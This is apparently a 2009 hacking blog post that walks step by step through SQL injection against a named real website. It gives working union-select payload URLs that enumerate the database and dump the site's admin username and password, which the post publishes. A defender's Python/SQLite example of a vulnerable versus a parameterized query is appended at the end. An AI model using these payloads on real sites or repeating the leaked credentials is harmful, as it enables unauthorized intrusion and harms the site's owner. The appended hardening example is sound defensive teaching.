The contents of this blog are now old, as I have not updated it in a long time. The mobile trick won't work now.

SQL Injection explained

Posted on Monday, March 23, 2009 by Ajit

Guys, the hacked site is available now (at the time of posting this topic; I can't say whether it will always be available).

ONLY FOR EDUCATIONAL PURPOSE

sq1 !nj3ct!on
sq1 !nj3ct!ng sites in 10 easy steps :D. Target for this walkthrough: http://rcci.org.pk/

STEP1 :-
First Open :
http://rcci.org.pk/noticedet.php?id=1
Here you see no errors, but let's still check whether this site throws any.

STEP2 :-
Add a single quote ( ' ) at the end of the URL: http://rcci.org.pk/noticedet.php?id=1' (the ' is added to check for errors)
Now you can see the error: Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/rcciorg/public_html/noticedet.php on line 67

STEP3 :-
http://rcci.org.pk/noticedet.php?id=1+order+by+6--
Now find the highest ORDER BY value that does not give an error. I tried 1-7; the last number without an error was 6, and 7 gave an error.

STEP4 :-
http://rcci.org.pk/noticedet.php?id=1+union+all+select+1,2,3,4,5,6--
I listed all the numbers up to 6; after doing so, the page output shows "2".

STEP5 :-
Now replace 2 with version(); this is the same in every SQL injection to find the version.
http://rcci.org.pk/noticedet.php?id=1+union+all+select+1,VERSION(),3,4,5,6--
You can see the version 5.0.51a- (meaning it is version 5), and very easy to hack :D

STEP6 :-
group_concat(schema_name) is put in place of 2 to list the schemas from information_schema, which is available because it is version 5.
http://rcci.org.pk/noticedet.php?id=1+union+all+select+1,group_concat(schema_name),3,4,5,6+from+information_schema.schemata--

RESULT : information_schema,rcciorg_rcci

STEP7 :-
http://rcci.org.pk/noticedet.php?id=1+union+all+select+1,group_concat(table_name),3,4,5,6+from+information_schema.tables+where+table_schema=database()--

We can query information_schema with the query above ^^^
RESULTS : rcci_admin,rcci_advertise,rcci_downloads,rcci_ec,rcci_embassies,rcci_faqc,rcci_faqs,
rcci_ie,rcci_lib,rcci_links,rcci_mdir,rcci_mform,rcci_newsevents,rcci_noticboard,
rcci_presidents,rcci_prm,rcci_profile,rcci_pub,rcci_sc,rcci_scm,rcci_sect,rcci_sitepages,
rcci_sro,rcci_vision

Now I want to hack the admin, so I will pick the first table, rcci_admin.

STEP8 :-
Now I need to encode rcci_admin into hex values; for that I used: http://www.waraxe.us/sql-char-encoder.html
http://rcci.org.pk/noticedet.php?id=1+union+all+select+1,group_concat(column_name),3,4,5,6+from+information_schema.columns+where+table_name=0x726363695f61646d696e

STEP9 :-
Now I know that rcci_admin = 0x726363695f61646d696e, so I used it in the above payload.
After visiting the page I got: admin_id,admin_username,admin_password,admin_name,admin_email,admin_phone,admin_createdate,admin_status

Obviously I need to know the admin username and password, so I'll pick two columns: admin_username and admin_password.

STEP10 :-
http://rcci.org.pk/noticedet.php?id=1+union+all+select+1,group_concat(admin_username,0x3a,admin_password),3,4,5,6+from+rcci_admin--

In this step I just gave the column names for the admin username and password, so the result I got was:

admin:player324

therefore

username : admin
password : player324


enjoy hacking in these 10 easy steps :D
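As an added defender's example (not code from the original post or from the site), here is a Python/SQLite stand-in for the vulnerable noticedet.php pattern next to a hardened version. The table and column names and the stored credential are constructed assumptions; the payload is the step-10 union query (URL-decoded), sized for a 6-column result as found in step 3.

```python
import sqlite3

# Constructed stand-in for the site's notice board and admin tables; the
# table and column names are assumptions, not the real schema from the post.
def build_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE notices(id INTEGER, title TEXT, body TEXT,
                             author TEXT, posted TEXT, status TEXT);
        INSERT INTO notices VALUES (1, 'Meeting', 'Annual meeting notice',
                                    'staff', '2009-03-23', 'live');
        CREATE TABLE site_admin(admin_username TEXT, admin_password TEXT);
        INSERT INTO site_admin VALUES ('admin', 'example-secret');
    """)
    return db

def fetch_notice_vulnerable(db, user_id):
    # The pattern behind noticedet.php?id=...: the id parameter is pasted
    # straight into the SQL text, so it can change the shape of the query
    # (the single quote in step 2 breaks the syntax, which is what the
    # mysql_fetch_array() warning then reveals to every visitor).
    sql = "SELECT * FROM notices WHERE id=" + user_id
    return db.execute(sql).fetchall()

def fetch_notice_hardened(db, user_id):
    # Validate the type the application expects, then bind the value so the
    # database never parses attacker-controlled text as SQL.
    if not user_id.isdigit():
        raise ValueError("id must be a positive integer")
    return db.execute("SELECT * FROM notices WHERE id=?",
                      (int(user_id),)).fetchall()

# The post's step-10 payload, decoded; SQLite's || stands in for MySQL's
# group_concat(a,0x3a,b) separator.
PAYLOAD = ("1 union all select 1,"
           "group_concat(admin_username||':'||admin_password),"
           "3,4,5,6 from site_admin--")

def demo():
    """Return (column-2 values the vulnerable query leaks,
    whether the hardened query rejected the same input)."""
    db = build_db()
    leaked = [row[1] for row in fetch_notice_vulnerable(db, PAYLOAD)]
    try:
        fetch_notice_hardened(db, PAYLOAD)
        blocked = False
    except ValueError:
        blocked = True
    return leaked, blocked

if __name__ == "__main__":
    print(demo())  # (['Meeting', 'admin:example-secret'], True)
```

The same input that appends a second SELECT to the concatenated query is rejected before it reaches the database in the hardened version, and a real deployment would also log the rejection and return a generic error page rather than the driver's warning text.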